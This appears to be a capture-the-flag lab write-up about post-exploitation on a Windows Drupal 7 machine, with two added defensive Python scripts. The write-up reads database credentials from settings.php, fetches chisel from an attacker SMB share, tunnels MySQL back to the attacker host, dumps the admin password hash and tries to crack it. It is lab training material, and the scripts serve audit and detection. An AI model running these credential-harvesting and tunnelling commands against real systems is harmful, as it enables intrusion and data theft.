DB


DB Credential


PS C:\inetpub\drupal-7.54\sites\default> dir
 
 
    Directory: C:\inetpub\drupal-7.54\sites\default
 
 
Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d----         19/3/2017   1:52 ??            files                             
-a---         19/3/2017  12:42 ??      26250 default.settings.php              
-a---        31/10/2022   4:17 ??      26528 settings.php                      
-ar--         19/3/2017  12:47 ??      26556 settings.php.bak

By default, a Windows installation of Drupal 7 stores the configuration file at sites\default. I can see the settings.php file.

PS C:\inetpub\drupal-7.54\sites\default> cat settings.php
<?php
 
[...REDACTED...]
 
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'root',
      'password' => 'mysql123!root',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
 
[...REDACTED...]
 
?>?

Found the DB credential: root:mysql123!root
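A defender-side audit of the same directory, added here as an example and not part of the original write-up: it reports stray copies of the settings file (such as the settings.php.bak in the listing above, which the web server may hand out as plain text) and a site that connects as a DBMS superuser. The sample file is constructed with a placeholder password, and the `COPY` suffix list and `PRIVILEGED` account names are assumptions.

```python
import re
import tempfile
from pathlib import Path

PAIR = re.compile(r"'(\w+)'\s*=>\s*'([^']*)'")   # 'key' => 'value'
COPY = re.compile(r"^settings\.php(\.(bak|old|orig|save|swp)|~)$", re.I)  # assumed suffixes
PRIVILEGED = {"root", "sa", "postgres"}          # assumed DBMS superuser names

# Constructed sample in the layout shown above; the password is a placeholder.
SAMPLE = """<?php
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'root',
      'password' => 'PLACEHOLDER',
      'host' => 'localhost',
      'driver' => 'mysql',
    ),
  ),
);
"""

def parse_db(text):
    """Return the key/value pairs of the live $databases assignment."""
    m = re.search(r"^\$databases\s*=\s*array\s*\((.*?)^\);", text, re.S | re.M)
    return dict(PAIR.findall(m.group(1))) if m else {}

def audit(site_dir):
    """List findings for one sites/<name> directory."""
    site, findings = Path(site_dir), []
    for f in sorted(site.iterdir()):
        if COPY.match(f.name):
            findings.append(f"stray copy of settings file: {f.name}")
    settings = site / "settings.php"
    if settings.is_file():
        db = parse_db(settings.read_text(errors="replace"))
        if db.get("username", "").lower() in PRIVILEGED:
            findings.append(f"site connects as DB superuser '{db['username']}'")
    return findings

def demo():
    """Build a throwaway directory mirroring the listing above and audit it."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("settings.php", "settings.php.bak", "default.settings.php"):
            (Path(d) / name).write_text(SAMPLE)
        return audit(d)
```

Calling `audit()` on a real `sites\default` path gives the same report; a dedicated least-privilege MySQL account for the `drupal` database clears the second finding.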

MySQL client

PS C:\inetpub\drupal-7.54\sites\default> mysql --version
C:\Program Files\MySQL\MySQL Server 5.5\bin\mysql.exe  Ver 14.14 Distrib 5.5.45, for Win64 (x86)

The MySQL client is installed on the target system at C:\Program Files\MySQL\MySQL Server 5.5\bin\mysql.exe

I was really hoping for it, as I saw port 3306 being open.

PS C:\Program Files> mysql -uroot -p
 
 
 

But it is really buggy and not stable.

I would have to tunnel port 3306 since I can’t directly reach it.

Tunneling


ps c:\tmp> copy \\10.10.14.6\smb\chiselx64.exe
ps c:\tmp> .\chiselx64.exe client 10.10.14.6:55555 R:33060:3306

I transferred chisel and connected to the server on Kali to tunnel the target port 3306 to Kali’s port 33060.

Connection received. I can now reach the target port 3306 through Kali’s port 33060.
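A detection sketch for the tunnel above, added here and not part of the original write-up: it flags process command lines by the `client <server> R:<forward>` argument shape rather than by executable name, and decodes which local service is being exposed. The sample command lines are constructed (the first mirrors the one above); the `SENSITIVE` port list and the `localhost` default target are assumptions.

```python
# Ports whose exposure through a tunnel warrants a higher-severity alert (assumed list).
SENSITIVE = {3306: "MySQL", 1433: "MSSQL", 5432: "PostgreSQL", 3389: "RDP", 445: "SMB"}

# Constructed process-creation command lines.
EVENTS = [
    r"C:\tmp\chiselx64.exe client 10.10.14.6:55555 R:33060:3306",
    r'"C:\Program Files\MySQL\MySQL Server 5.5\bin\mysql.exe" -uroot -p',
    r"C:\tools\ftp.exe client R:\share\notes.txt",
]

def parse_reverse(remote):
    """Decode 'R:[lhost:]lport:[rhost:]rport' -> (listen_port, target_host, target_port)."""
    parts = remote[2:].split("/")[0].split(":")   # drop an optional /udp suffix
    if not parts[-1].isdigit():
        return None                               # e.g. R:socks, not a fixed forward
    rport = int(parts.pop())
    # Assumed default: a forward without a host targets the client machine itself.
    rhost = parts.pop() if parts and not parts[-1].isdigit() else "localhost"
    lport = int(parts.pop()) if parts and parts[-1].isdigit() else rport
    return lport, rhost, rport

def detect(cmdline):
    """Return one finding per reverse forward in a 'client <server> R:...' command line."""
    tokens = cmdline.split()
    lowered = [t.lower() for t in tokens]
    if "client" not in lowered:
        return []
    # Positional arguments after 'client'; values of flags are not modelled.
    args = [t for t in tokens[lowered.index("client") + 1:] if not t.startswith("-")]
    if not args:
        return []
    server, findings = args[0], []
    for arg in args[1:]:
        fwd = parse_reverse(arg) if arg.startswith("R:") else None
        if fwd:
            lport, rhost, rport = fwd
            findings.append({"server": server, "listen_port": lport,
                             "target": f"{rhost}:{rport}",
                             "service": SENSITIVE.get(rport, "other")})
    return findings

def scan(events):
    """Pair every flagged command line with its findings."""
    return [(e, f) for e in events for f in detect(e)]
```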

MySQL server


┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ mysql -P 33060 -uroot -p
Enter password: mysql123!root
WARNING: Forcing protocol to  TCP  due to option specification. Please explicitly state intended protocol.
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 29
Server version: 5.5.45 MySQL Community Server (GPL)
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MySQL [(none)]>

I successfully logged in to the target MySQL server.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupal             |
| mysql              |
| performance_schema |
| test               |
+--------------------+
5 rows in set (0.031 sec)

There are 2 non-default DBs: drupal and test.

MySQL [(none)]> use test;
Database changed
MySQL [test]> show tables;
Empty set (0.031 sec)

The test DB is empty

MySQL [test]> use drupal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
MySQL [drupal]> select name,pass from users;
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
|       |                                                         |
| admin | $S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE |
+-------+---------------------------------------------------------+
2 rows in set (0.031 sec)

I got a credential hash, but this must be the web user.

PS C:\hashcat-6.2.6> .\hashcat.exe -a 0 -m 7900 .\hashes .\rockyou.txt -d 2 -O --self-test-dis
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 7900 (Drupal7)
Hash.Target......: $S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE
Time.Started.....: Sat Jan 14 10:49:02 2023 (9 mins, 36 secs)
Time.Estimated...: Sat Jan 14 10:58:38 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:    24901 H/s (1.02ms) @ Accel:16 Loops:256 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:32512-32768
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[203020302030] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#2..: Temp: 65c Util: 73% Core:1792MHz Mem:6000MHz Bus:8
 
Started: Sat Jan 14 10:48:44 2023
Stopped: Sat Jan 14 10:58:40 2023

Hashcat could not crack the password hash. Dead end.